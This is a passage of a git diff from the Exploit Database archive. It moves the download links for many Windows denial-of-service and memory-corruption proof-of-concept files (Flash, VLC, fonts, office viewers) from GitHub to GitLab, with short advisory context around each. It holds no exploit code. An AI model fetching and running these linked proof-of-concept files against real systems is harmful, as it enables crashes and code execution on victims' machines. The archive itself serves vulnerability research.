+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38344.zip \ No newline at end of file diff --git a/exploits/windows/dos/38348.txt b/exploits/windows/dos/38348.txt index 5a9a671f8..7ef724f17 100644 --- a/exploits/windows/dos/38348.txt +++ b/exploits/windows/dos/38348.txt @@ -27,4 +27,4 @@ I’ve provided a simple example which allocates a 16k UInt vector. Using a debu The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10” Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38348.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38348.zip \ No newline at end of file diff --git a/exploits/windows/dos/38485.py b/exploits/windows/dos/38485.py index 817aa32ee..f4aa29469 100755 --- a/exploits/windows/dos/38485.py +++ b/exploits/windows/dos/38485.py @@ -5,7 +5,7 @@ # Version: 2.2.1 # Tested on: Windows 7 Professional 64 bits # -# PoC with MP3: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38485.zip +# PoC with MP3: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38485.zip # #APP: vlc.exe diff --git a/exploits/windows/dos/38580.txt b/exploits/windows/dos/38580.txt index 8685da5bf..bb8ad36f4 100644 --- a/exploits/windows/dos/38580.txt +++ b/exploits/windows/dos/38580.txt @@ -44,4 +44,4 @@ Observed Result: The reference cycle is created and the user can reopen the process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38580.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38580.zip \ No newline at end of file diff --git a/exploits/windows/dos/38701.txt b/exploits/windows/dos/38701.txt index 9cea10930..1f9c20c65 100644 --- a/exploits/windows/dos/38701.txt +++ b/exploits/windows/dos/38701.txt @@ -47,4 +47,4 @@ PoC: - http://zeroscience.mk/codes/sg2fbd-5276.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38701.zip \ No newline at end of file +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38701.zip \ No newline at end of file diff --git a/exploits/windows/dos/38702.txt b/exploits/windows/dos/38702.txt index 41b0ff4b2..8de00d1c3 100644 --- a/exploits/windows/dos/38702.txt +++ b/exploits/windows/dos/38702.txt @@ -44,4 +44,4 @@ PoC: - http://zeroscience.mk/codes/tp3tpc-5277.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38702.zip \ No newline at end of file +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38702.zip \ No newline at end of file diff --git a/exploits/windows/dos/38703.txt b/exploits/windows/dos/38703.txt index c85ef80ab..4e947c9b1 100644 --- a/exploits/windows/dos/38703.txt +++ b/exploits/windows/dos/38703.txt @@ -45,4 +45,4 @@ PoC: - http://zeroscience.mk/codes/aptpc-5278.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38703.zip \ No newline at end of file +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38703.zip \ No newline at end of file diff --git a/exploits/windows/dos/38713.txt b/exploits/windows/dos/38713.txt index 8beb51715..3ead1bf54 100644 --- a/exploits/windows/dos/38713.txt +++ b/exploits/windows/dos/38713.txt @@ -84,4 +84,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38713.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38713.zip \ No newline at end of file diff --git a/exploits/windows/dos/38714.txt b/exploits/windows/dos/38714.txt index e5d1c1bf7..ffbabaee8 100644 --- a/exploits/windows/dos/38714.txt +++ b/exploits/windows/dos/38714.txt @@ -81,4 +81,4 @@ The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce wi Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38714.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38714.zip \ No newline at end of file diff --git a/exploits/windows/dos/38735.txt b/exploits/windows/dos/38735.txt index 84e6b12e6..8abd2ff21 100644 --- a/exploits/windows/dos/38735.txt +++ b/exploits/windows/dos/38735.txt @@ -35,4 +35,4 @@ avengine_dll!ekaGetObjectFactory+0x51537: This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38735.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38735.zip \ No newline at end of file diff --git a/exploits/windows/dos/38736.txt b/exploits/windows/dos/38736.txt index 85e542d03..8247bb833 100644 --- a/exploits/windows/dos/38736.txt +++ b/exploits/windows/dos/38736.txt @@ -99,4 +99,4 @@ Entry User Heap Segment Size PrevSize Unused Flags # So looks like an exploitable use after free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38736.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38736.zip \ No newline at end of file diff --git a/exploits/windows/dos/38761.py b/exploits/windows/dos/38761.py index 485925e58..4c607c51b 100755 --- a/exploits/windows/dos/38761.py +++ b/exploits/windows/dos/38761.py @@ -18,4 +18,4 @@ file.write(buffer) file.close() -# Follow on twitter @vik.create +# Follow on twitter @vik.create \ No newline at end of file diff --git a/exploits/windows/dos/38787.txt b/exploits/windows/dos/38787.txt index bc7893168..e3b63a862 100644 --- a/exploits/windows/dos/38787.txt +++ b/exploits/windows/dos/38787.txt @@ -62,6 +62,6 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary =========== http://protekresearchlab.com/exploits/COSIG-2015-001.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38787.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38787.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/38788.txt b/exploits/windows/dos/38788.txt index bbddbcfb0..fa3522de8 100644 --- a/exploits/windows/dos/38788.txt +++ b/exploits/windows/dos/38788.txt @@ -58,6 +58,6 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary =========== http://protekresearchlab.com/exploits/COSIG-2015-002.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38788.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38788.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/38789.txt b/exploits/windows/dos/38789.txt index 1ee393411..6954ab146 100644 --- a/exploits/windows/dos/38789.txt +++ b/exploits/windows/dos/38789.txt @@ -58,6 +58,6 @@ Successful exploitation of the vulnerabilities may allow execution of arbitrary =========== http://protekresearchlab.com/exploits/COSIG-2015-003.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38789.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38789.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/38793.txt b/exploits/windows/dos/38793.txt index 32cd3362b..3f248bafa 100644 --- a/exploits/windows/dos/38793.txt +++ b/exploits/windows/dos/38793.txt @@ -4,4 +4,4 @@ The attached testcase crashes Windows 7 32-bit due to a pool buffer overflow in --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38793.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38793.zip \ No newline at end of file diff --git a/exploits/windows/dos/38794.txt b/exploits/windows/dos/38794.txt index 22b3ef781..57b8501cc 100644 --- a/exploits/windows/dos/38794.txt +++ b/exploits/windows/dos/38794.txt @@ -6,4 +6,4 @@ When reproducing this issue in VMWare, it is necessary to remove VMWare tools. I --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38794.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38794.zip \ No newline at end of file diff --git a/exploits/windows/dos/38795.txt b/exploits/windows/dos/38795.txt index 165dd4e51..9e79a5624 100644 --- a/exploits/windows/dos/38795.txt +++ b/exploits/windows/dos/38795.txt @@ -5,4 +5,4 @@ The attached testcase crashes Window 7 32-bit with Special Pool enabled on win32 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38795.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38795.zip \ No newline at end of file diff --git a/exploits/windows/dos/38796.txt b/exploits/windows/dos/38796.txt index 816746020..238714fd5 100644 --- a/exploits/windows/dos/38796.txt +++ b/exploits/windows/dos/38796.txt @@ -4,4 +4,4 @@ The attached testcase triggers a use-after-free condition in win32k. The attache --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38796.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38796.zip \ No newline at end of file diff --git a/exploits/windows/dos/38858.txt b/exploits/windows/dos/38858.txt index 52fb03c6a..964223d20 100644 --- a/exploits/windows/dos/38858.txt +++ b/exploits/windows/dos/38858.txt @@ -46,4 +46,4 @@ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData =========== 4) POC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38858.exe \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38858.exe \ No newline at end of file diff --git a/exploits/windows/dos/38934.txt b/exploits/windows/dos/38934.txt index 0522a9746..748186985 100644 --- a/exploits/windows/dos/38934.txt +++ b/exploits/windows/dos/38934.txt @@ -5,4 +5,4 @@ If the numFonts field in the TTC header is greater than (SIZE_MAX+1) / 4, an int The TTC file format is described here https://www.microsoft.com/typography/otspec/otff.htm Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38934.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38934.zip \ No newline at end of file diff --git a/exploits/windows/dos/39019.txt b/exploits/windows/dos/39019.txt index a35073b5b..14633399d 100644 --- a/exploits/windows/dos/39019.txt +++ b/exploits/windows/dos/39019.txt @@ -44,4 +44,4 @@ my_text3.setTextFormat(my_format); A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39019.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39019.zip \ No newline at end of file diff --git a/exploits/windows/dos/39020.txt b/exploits/windows/dos/39020.txt index ef698a42b..c7fda71fd 100644 --- a/exploits/windows/dos/39020.txt +++ b/exploits/windows/dos/39020.txt @@ -45,4 +45,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39020.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39020.zip \ No newline at end of file diff --git a/exploits/windows/dos/39021.txt b/exploits/windows/dos/39021.txt index f3bfb56b5..65b4b3001 100644 --- a/exploits/windows/dos/39021.txt +++ b/exploits/windows/dos/39021.txt @@ -17,4 +17,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39021.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39021.zip \ No newline at end of file diff --git a/exploits/windows/dos/39022.txt b/exploits/windows/dos/39022.txt index e642929aa..22dfb321c 100644 --- a/exploits/windows/dos/39022.txt +++ b/exploits/windows/dos/39022.txt @@ -43,4 +43,4 @@ A sample swf and fla is attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39022.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39022.zip \ No newline at end of file diff --git a/exploits/windows/dos/39025.txt b/exploits/windows/dos/39025.txt index eca7d9add..e0abe3ba8 100644 --- a/exploits/windows/dos/39025.txt +++ b/exploits/windows/dos/39025.txt @@ -5,4 +5,4 @@ The attached PoC triggers a null pointer vulnerability in OffsetChildren on Wind Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39025.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39025.zip \ No newline at end of file diff --git a/exploits/windows/dos/39040.txt b/exploits/windows/dos/39040.txt index 8153ce227..49650b635 100644 --- a/exploits/windows/dos/39040.txt +++ b/exploits/windows/dos/39040.txt @@ -21,4 +21,4 @@ function func(){ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39040.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip \ No newline at end of file diff --git a/exploits/windows/dos/39041.txt b/exploits/windows/dos/39041.txt index 585cf8eab..e4c480baf 100644 --- a/exploits/windows/dos/39041.txt +++ b/exploits/windows/dos/39041.txt @@ -22,4 +22,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39041.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39041.zip \ No newline at end of file diff --git a/exploits/windows/dos/39042.txt b/exploits/windows/dos/39042.txt index cdd81215d..361ee9b9c 100644 --- a/exploits/windows/dos/39042.txt +++ b/exploits/windows/dos/39042.txt @@ -26,4 +26,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39042.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39042.zip \ No newline at end of file diff --git a/exploits/windows/dos/39044.txt b/exploits/windows/dos/39044.txt index f7d956d6c..80690b43a 100644 --- a/exploits/windows/dos/39044.txt +++ b/exploits/windows/dos/39044.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39044.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39044.zip \ No newline at end of file diff --git a/exploits/windows/dos/39045.txt b/exploits/windows/dos/39045.txt index 0e8deb647..5c5fddb05 100644 --- a/exploits/windows/dos/39045.txt +++ b/exploits/windows/dos/39045.txt @@ -28,4 +28,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39045.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39045.zip \ No newline at end of file diff --git a/exploits/windows/dos/39046.txt b/exploits/windows/dos/39046.txt index 8be5593aa..515213e64 100644 --- a/exploits/windows/dos/39046.txt +++ b/exploits/windows/dos/39046.txt @@ -30,4 +30,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39046.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39046.zip \ No newline at end of file diff --git a/exploits/windows/dos/39047.txt b/exploits/windows/dos/39047.txt index 733ea4c76..86b4f9abd 100644 --- a/exploits/windows/dos/39047.txt +++ b/exploits/windows/dos/39047.txt @@ -22,4 +22,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39047.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39047.zip \ No newline at end of file diff --git a/exploits/windows/dos/39048.txt b/exploits/windows/dos/39048.txt index 0b51630d6..56d7fa456 100644 --- a/exploits/windows/dos/39048.txt +++ b/exploits/windows/dos/39048.txt @@ -23,4 +23,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39048.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39048.zip \ No newline at end of file diff --git a/exploits/windows/dos/39049.txt b/exploits/windows/dos/39049.txt index 0b4e388f7..9b86058e1 100644 --- a/exploits/windows/dos/39049.txt +++ b/exploits/windows/dos/39049.txt @@ -29,4 +29,4 @@ A sample fla and swf are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39049.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39049.zip \ No newline at end of file diff --git a/exploits/windows/dos/39050.txt b/exploits/windows/dos/39050.txt index fc37e163a..0cd6989d9 100644 --- a/exploits/windows/dos/39050.txt +++ b/exploits/windows/dos/39050.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39050.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39050.zip \ No newline at end of file diff --git a/exploits/windows/dos/39051.txt b/exploits/windows/dos/39051.txt index 6c960c6b4..15d25c650 100644 --- a/exploits/windows/dos/39051.txt +++ b/exploits/windows/dos/39051.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39051.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39051.zip \ No newline at end of file diff --git a/exploits/windows/dos/39052.txt b/exploits/windows/dos/39052.txt index 3ebc1ace1..93299b37a 100644 --- a/exploits/windows/dos/39052.txt +++ b/exploits/windows/dos/39052.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39052.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39052.zip \ No newline at end of file diff --git a/exploits/windows/dos/39053.txt b/exploits/windows/dos/39053.txt index 761464fa2..0806c367f 100644 --- a/exploits/windows/dos/39053.txt +++ b/exploits/windows/dos/39053.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39053.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip \ No newline at end of file diff --git a/exploits/windows/dos/39054.txt b/exploits/windows/dos/39054.txt index a7b749ed1..81027751a 100644 --- a/exploits/windows/dos/39054.txt +++ b/exploits/windows/dos/39054.txt @@ -25,4 +25,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39054.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39054.zip \ No newline at end of file diff --git a/exploits/windows/dos/39055.txt b/exploits/windows/dos/39055.txt index 0a5d62c77..8f6e5a6b1 100644 --- a/exploits/windows/dos/39055.txt +++ b/exploits/windows/dos/39055.txt @@ -20,4 +20,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39055.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39055.zip \ No newline at end of file diff --git a/exploits/windows/dos/39056.txt b/exploits/windows/dos/39056.txt index 290b33f77..d961db298 100644 --- a/exploits/windows/dos/39056.txt +++ b/exploits/windows/dos/39056.txt @@ -23,4 +23,4 @@ A sample swf and fla are attached. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39056.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39056.zip \ No newline at end of file diff --git a/exploits/windows/dos/39220.txt b/exploits/windows/dos/39220.txt index e4abf529e..324e63ef6 100644 --- a/exploits/windows/dos/39220.txt +++ b/exploits/windows/dos/39220.txt @@ -4,4 +4,4 @@ There is a use-after-free that appears to be related to rendering the display ba Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39220.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39220.zip \ No newline at end of file diff --git a/exploits/windows/dos/39232.txt b/exploits/windows/dos/39232.txt index f0a98f14e..1e63223f3 100644 --- a/exploits/windows/dos/39232.txt +++ b/exploits/windows/dos/39232.txt @@ -44,4 +44,4 @@ The DeviceMoniker::Load() method should limit the user supplied size to sane val Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39232.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39232.zip \ No newline at end of file diff --git a/exploits/windows/dos/39233.txt b/exploits/windows/dos/39233.txt index c50763b05..9425165ff 100644 --- a/exploits/windows/dos/39233.txt +++ b/exploits/windows/dos/39233.txt @@ -46,4 +46,4 @@ This DLL load can be triggered without user interaction with the following RTF d Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39233.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39233.zip \ No newline at end of file diff --git a/exploits/windows/dos/39275.txt b/exploits/windows/dos/39275.txt index 650ba48e7..32c9ff9ef 100644 --- a/exploits/windows/dos/39275.txt +++ b/exploits/windows/dos/39275.txt @@ -49,6 +49,6 @@ POC: ========== https://smsecurity.net/pdf-xchange-viewer-shading-type-7-heap-memory-corruption/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39275.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39275.zip ######################################################################################## \ No newline at end of file diff --git a/exploits/windows/dos/39330.txt b/exploits/windows/dos/39330.txt index 4f8cf1035..ae94ec25d 100644 --- a/exploits/windows/dos/39330.txt +++ b/exploits/windows/dos/39330.txt @@ -61,6 +61,6 @@ to execute arbitrary code under the context of the current process. =========== http://protekresearchlab.com/exploits/COSIG-2016-02.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39330.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39330.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39353.txt b/exploits/windows/dos/39353.txt index 002795f38..77feff90b 100644 --- a/exploits/windows/dos/39353.txt +++ b/exploits/windows/dos/39353.txt @@ -59,6 +59,6 @@ An heap memory corruption occured when VLC parsed an malformed MPEG-4 file that =========== http://protekresearchlab.com/exploits/COSIG-2016-03.mp4 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39353.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39353.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39393.txt b/exploits/windows/dos/39393.txt index 96ac32ca5..a96cfc404 100644 --- a/exploits/windows/dos/39393.txt +++ b/exploits/windows/dos/39393.txt @@ -54,7 +54,7 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php thricer.dqp project PoC: Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39393.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39393.zip ------------------------ <DAQMaster xmlns="http://www.w3.org/2001/XMLSchema-instance"> diff --git a/exploits/windows/dos/39395.txt b/exploits/windows/dos/39395.txt index f421104ed..41c095164 100644 --- a/exploits/windows/dos/39395.txt +++ b/exploits/windows/dos/39395.txt @@ -66,6 +66,6 @@ on vulnerable installations of WPS. User interaction is required to exploit this =========== http://protekresearchlab.com/exploits/COSIG-2016-04.ppt -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39395.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39395.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39396.txt b/exploits/windows/dos/39396.txt index 8ffb7cf85..03bb1bdd8 100644 --- a/exploits/windows/dos/39396.txt +++ b/exploits/windows/dos/39396.txt @@ -68,6 +68,6 @@ data section causing a stackbase memory corruption. =========== http://protekresearchlab.com/exploits/COSIG-2016-05.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39396.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39396.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39397.txt b/exploits/windows/dos/39397.txt index 5206a3011..9ffeeb0e6 100644 --- a/exploits/windows/dos/39397.txt +++ b/exploits/windows/dos/39397.txt @@ -66,6 +66,6 @@ By providing a malformed .ppt file, an attacker can cause an memory corruption b =========== http://protekresearchlab.com/exploits/COSIG-2016-06.ppt -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39397.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39397.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39398.txt b/exploits/windows/dos/39398.txt index d4b60cb84..37c2c7da2 100644 --- a/exploits/windows/dos/39398.txt +++ b/exploits/windows/dos/39398.txt @@ -65,6 +65,6 @@ An attacker could leverage this to execute arbitrary code under the context of t =========== http://protekresearchlab.com/exploits/COSIG-2016-07.xlsx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39398.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39398.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39403.py b/exploits/windows/dos/39403.py index 7ca61b1c0..f05ff1c39 100755 --- a/exploits/windows/dos/39403.py +++ b/exploits/windows/dos/39403.py @@ -86,5 +86,5 @@ print "File exploit.app created!\n" # # PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip -# https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39403.zip +# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39403.zip # \ No newline at end of file diff --git a/exploits/windows/dos/39428.txt b/exploits/windows/dos/39428.txt index 31a9a145a..47b28b8c7 100644 --- a/exploits/windows/dos/39428.txt +++ b/exploits/windows/dos/39428.txt @@ -26,4 +26,4 @@ POTPLAYER has buffer overflow in png parser of image of MP3 offset 5B . Crash is because of '\x22' at offset 5B Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39428.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39428.zip \ No newline at end of file diff --git a/exploits/windows/dos/39429.txt b/exploits/windows/dos/39429.txt index 4efd68f36..ab660993b 100644 --- a/exploits/windows/dos/39429.txt +++ b/exploits/windows/dos/39429.txt @@ -64,7 +64,7 @@ This vulnerability allows remote attackers to execute arbitrary code on vulnerab http://protekresearchlab.com/exploits/COSIG-2016-08-1.png http://protekresearchlab.com/exploits/COSIG-2016-08-2.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39429.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39429.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39430.txt b/exploits/windows/dos/39430.txt index 07c39b784..c57c77463 100644 --- a/exploits/windows/dos/39430.txt +++ b/exploits/windows/dos/39430.txt @@ -64,6 +64,6 @@ This vulnerability allows remote attackers to execute arbitrary code on vulnerab http://protekresearchlab.com/exploits/COSIG-2016-09-1.png http://protekresearchlab.com/exploits/COSIG-2016-09-2.png -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39430.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39430.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39431.txt b/exploits/windows/dos/39431.txt index 46e03cbb1..6c5f88783 100644 --- a/exploits/windows/dos/39431.txt +++ b/exploits/windows/dos/39431.txt @@ -61,6 +61,6 @@ This vulnerability allows remote attackers to execute arbitrary code on vulnerab http://protekresearchlab.com/exploits/COSIG-2016-10.iff -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39431.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39431.zip ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/39444.txt b/exploits/windows/dos/39444.txt index 2a24dc4f0..e2dc30af9 100644 --- a/exploits/windows/dos/39444.txt +++ b/exploits/windows/dos/39444.txt @@ -23,4 +23,4 @@ Alternate Pic 